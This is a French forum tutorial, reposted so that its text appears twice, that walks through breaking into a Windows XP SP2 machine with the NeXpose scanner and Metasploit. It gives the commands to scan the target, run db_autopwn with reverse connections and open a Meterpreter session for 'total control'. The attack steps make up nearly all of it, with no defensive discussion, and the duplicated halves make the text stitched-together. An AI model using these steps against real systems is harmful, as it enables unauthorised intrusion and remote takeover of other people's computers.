[b]Intrusion système avec NeXpose & Metasploit
Le PC-Attaquant 192.168.118.118 Ubuntu
La PC-Cible 10.0.0.10 Windows XP SP2
Pré-requis: Tout d'abord vous devez télécharger et installer le framework Metasploit (Version antérieure avec autopwn: https://bitbucket.org/jrossi/metasploit) et le scanner NeXpose.
Veillez à ce que Metasploit soit à jour:
I-Démarage du server NeXpose
Nous allons démarrer le server depuis son répertoire d'installation par défaut.
Ouvrez un terminal et lancez les commandes suivantes:
I-a (optionnel) Sniffing du réseau
Nous allons sniffer le réseau pour savoir si le scan se déroule bien et, dans l'éventualité d'un problème nous aurions une trace de la source de celui-ci.
Dans un nouveau terminal:
192.168.118.118: à remplacer par l'adresse IP du PC-Attaquant.
10.0.0.10: à remplacer par l'adresse IP du PC-Cible.
II-Création de la base de donnée
Dans un nouveau terminal nous démarons la console Metasploit:
Nous créons la base de données:
Si la base de données est déjà créée il suffit de s'y connecter:
III-Lancement du plugin NeXpose
Dans la console Metasploit:
IV-Connexion au serveur NeXpose
Maintenant nous allons nous connecter au serveur NeXpose:
<admin>: à remplacer par l'identifiant renseigné lors de l'installation de NeXpose.
<passwd>: à remplacer par le password renseigné lors de l'installation de NeXpose.
<NeXpose_hostname>: à remplacer par l'adresse de votre server.
Dans mon cas:
V-Pentest du PC-Cible
Maintenant que nous sommes connectés au serveur NeXpose nous pouvons lancer le scan sur le PC-Cible:
10.0.0.10: à remplacer par l'adresse IP du PC-Cible.
VI- Exploitations des vulnérabilités découvertes
Maintenant que le scan est complété, le module "db_autopwn" peut-être invoqué afin d’exploiter les vulnérabilités découvertes sur le PC-Cible.
Nous allons utiliser les options suivantes:
Nous exécutons:
VII-Connexion à la session Meterpreter
Désormais la cible est compromise par un des exploits, une session meterpreter s’est établie automatiquement entre le PC-Cible et le PC-Attaquant.
Il suffit de sélectionner la session et d’interagir avec cette dernière à l’aide de la commande:
1: à remplacer par le numéro de session de votre choix.
L’option –i signifie « interagir » et le « 1 » signifie le numéro de sessions choisi.
VIII-Exercice de votre contrôle sur le PC-Cible
Désormais vous avez un contrôle total sur le PC-Cible.
Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
source:cusin
Le PC-Attaquant 192.168.118.118 Ubuntu
La PC-Cible 10.0.0.10 Windows XP SP2
Pré-requis: Tout d'abord vous devez télécharger et installer le framework Metasploit (Version antérieure avec autopwn: https://bitbucket.org/jrossi/metasploit) et le scanner NeXpose.
Veillez à ce que Metasploit soit à jour:
Code:
msfupdate
I-Démarage du server NeXpose
Nous allons démarrer le server depuis son répertoire d'installation par défaut.
Ouvrez un terminal et lancez les commandes suivantes:
Code:
cd /opt/rapid7/nexpose/nsc
Code:
./nsc.sh
I-a (optionnel) Sniffing du réseau
Nous allons sniffer le réseau pour savoir si le scan se déroule bien et, dans l'éventualité d'un problème nous aurions une trace de la source de celui-ci.
Dans un nouveau terminal:
Code:
sudo tcpdump –i eth0 –nn host 192.168.118.118 and host 10.0.0.10
10.0.0.10: à remplacer par l'adresse IP du PC-Cible.
II-Création de la base de donnée
Dans un nouveau terminal nous démarons la console Metasploit:
Code:
msfconsole
Nous créons la base de données:
Code:
db_create
Code:
db_connect
III-Lancement du plugin NeXpose
Dans la console Metasploit:
Code:
load nexpose
IV-Connexion au serveur NeXpose
Maintenant nous allons nous connecter au serveur NeXpose:
Code:
nexpose_connect <admin>:<passwd>@<NeXpose_hostname>
<passwd>: à remplacer par le password renseigné lors de l'installation de NeXpose.
<NeXpose_hostname>: à remplacer par l'adresse de votre server.
Dans mon cas:
Code:
nexpose_connect _47:[email protected]
V-Pentest du PC-Cible
Maintenant que nous sommes connectés au serveur NeXpose nous pouvons lancer le scan sur le PC-Cible:
Code:
nexpose_scan –v 10.0.0.10
VI- Exploitations des vulnérabilités découvertes
Maintenant que le scan est complété, le module "db_autopwn" peut-être invoqué afin d’exploiter les vulnérabilités découvertes sur le PC-Cible.
Nous allons utiliser les options suivantes:
Code:
-t (afficher tous les modules d’exploits ayant une correspondance avec le résultat du scan), –x (sélectionner les modules d’exploits basés sur les références des vulnérabilités), –e (lancer les exploits sur toutes les cibles vulnérables à un exploit donné), –r (utiliser une connexion « reversée », comme "reverse_tcp")
Nous exécutons:
Code:
db_autopwn –t –x –e -r
VII-Connexion à la session Meterpreter
Désormais la cible est compromise par un des exploits, une session meterpreter s’est établie automatiquement entre le PC-Cible et le PC-Attaquant.
Il suffit de sélectionner la session et d’interagir avec cette dernière à l’aide de la commande:
Code:
session –i 1
L’option –i signifie « interagir » et le « 1 » signifie le numéro de sessions choisi.
VIII-Exercice de votre contrôle sur le PC-Cible
Désormais vous avez un contrôle total sur le PC-Cible.
Vous pouvez voir l'étentue des possibilités de Meterpreter avec la commande:
Code:
help
source:cusin
Commentaire